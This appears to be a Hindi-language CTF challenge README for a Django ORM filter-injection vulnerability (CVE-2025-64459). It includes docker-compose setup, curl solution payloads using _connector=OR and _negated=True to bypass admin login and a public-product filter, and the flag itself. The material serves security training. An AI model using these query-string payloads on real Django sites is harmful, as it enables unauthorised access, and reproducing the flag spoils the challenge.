
CTF चुनौती जो Django ORM फ़िल्टर इंजेक्शन (CVE-2025-64459) को प्रदर्शित करती है, जिसमें प्रमाणीकरण बाईपास और उत्पाद फ़िल्टर बाईपास शोषण शामिल हैं, साथ ही परिनियोजन और ध्वज पुनर्प्राप्ति।
श्रेणी: वेब सुरक्षा
कठिनाई: मध्यम
कमज़ोरी: CVE-2025-64459 - Django ORM फ़िल्टर इंजेक्शन
हमने एक सुरक्षित मर्च दुकान बनाई है जिसमें एडमिन पैनल है। क्या आप प्रमाणीकरण को बायपास करके निजी एडमिन नोट ढूँढ सकते हैं?
URL: http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# _connector=OR का उपयोग करके
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# _negated का उपयोग करके
curl "http://HOST:8054/login/?username=admin&_negated=True"
# is_public फ़िल्टर को नकारें
curl "http://HOST:8054/?_negated=True"
# सीधा उपयोग
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me